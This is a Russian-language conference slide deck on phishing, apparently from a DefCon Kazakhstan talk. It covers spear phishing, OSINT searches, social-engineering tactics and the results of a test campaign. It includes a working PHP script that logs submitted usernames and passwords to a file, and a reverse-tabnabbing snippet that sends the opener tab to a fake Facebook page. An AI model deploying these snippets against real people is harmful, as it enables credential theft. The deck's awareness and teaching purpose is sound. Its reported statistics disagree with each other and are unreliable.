Download - Фишинг (Стекольников Илья)
![Page 1: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/1.jpg)
![Page 2: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/2.jpg)
[~]$ whoami
Стекольников Илья
Место работы:
Опыт: с 2006 года
![Page 3: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/3.jpg)
Фишинг
(англ. phishing, от fishing — рыбная ловля, выуживание) — вид интернет-мошенничества, целью которого является получение доступа к конфиденциальным данным пользователей — логинам и паролям или иной представляющей интерес информации используя принципысоциальной инженерии.
![Page 4: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/4.jpg)
Фишинг: Vishing
Вишинг(vishing — voice phishing)
![Page 5: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/5.jpg)
Фишинг : Spear phishingНаправленный Фишинг
• Социальная инженерия• OSINT (Open source intelligence)• Телефон, email, sms• Технические средства
![Page 6: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/6.jpg)
Методы и средства:
![Page 7: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/7.jpg)
Методы и средства:
![Page 8: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/8.jpg)
Методы и средства:
![Page 9: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/9.jpg)
Методы и средства:
![Page 10: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/10.jpg)
Facebook Graph Search :
• People who work at %EMPLOYER%
• Comments by %USERNAME% from Almaty
• Posts liked by %USERNAME% at 2016
• Posts liked by People who work at %EMPLOYER%
• People who are younger than 50 and older than 40 and work at %EMPLOYER%
Примеры поисковых запросов:
![Page 11: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/11.jpg)
Методы и средства:
![Page 12: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/12.jpg)
Social Engineering :
• НЛП
• Неоднократные обращения
• Обычные письма содержащие интересные для сотрудника данные
• Обратная социальная инженерия
• Физический доступ
![Page 13: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/13.jpg)
Social Engineering :
• НЛП
• Неоднократные обращения
• Обычные письма содержащие интересные для сотрудника данные
• Обратная социальная инженерия
• Физический доступ
![Page 14: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/14.jpg)
Пример:
![Page 15: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/15.jpg)
Как было сделано. Простая реализация
![Page 16: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/16.jpg)
Как было сделано. Простая реализация
![Page 17: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/17.jpg)
Как было сделано. s.php
<?$Login = $_POST[acc];$Pass = $_POST['pass'];$log = fopen("log.php","a+");fwrite($log,"<br> $Login:$Pass \n");fclose($log);
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=https://drive.google.com/file/d/0B0ipfHYtZ3M/view?usp=sharing'></head></html>";
?>
![Page 18: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/18.jpg)
Еще вариант:target="_blank” (в новом окне)
![Page 19: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/19.jpg)
Еще кое-что:target="_blank”
![Page 20: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/20.jpg)
Еще кое-что:
target="_blank”
![Page 21: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/21.jpg)
Как это работает: target="_blank”<a href=“http://defconkz.tk” target="_blank">В новом окне</a>
<script>
window.opener.location = 'http://FAKE_FACEBOOK.tk/f.html';
</script>
![Page 22: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/22.jpg)
Статистика:ИТОГО: • 50% пользователей ввели учетные данные
• 70% пользователей так или иначе выдали конфиденциальную информацию
• 10% пользователей предоставили доступ к ПК через интернет
• Физический доступ в помещение
![Page 23: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/23.jpg)
Выводы:
ИТОГО:
• 5 из 10 пользователей ввели учетные данные
• 7 из 10 пользователей так или иначе выдали конфиденциальную информацию
• 2 из 10 пользователей предоставили доступ к ПК через интернет
• Физический доступ в помещение
ВЫВОДЫ:
Social engineering: Because there is NO PATCH for human stupidity.
![Page 24: Фишинг (Стекольников Илья)](https://reader034.vdocuments.site/reader034/viewer/2022042605/586f9d541a28abcc238b5dcd/html5/thumbnails/24.jpg)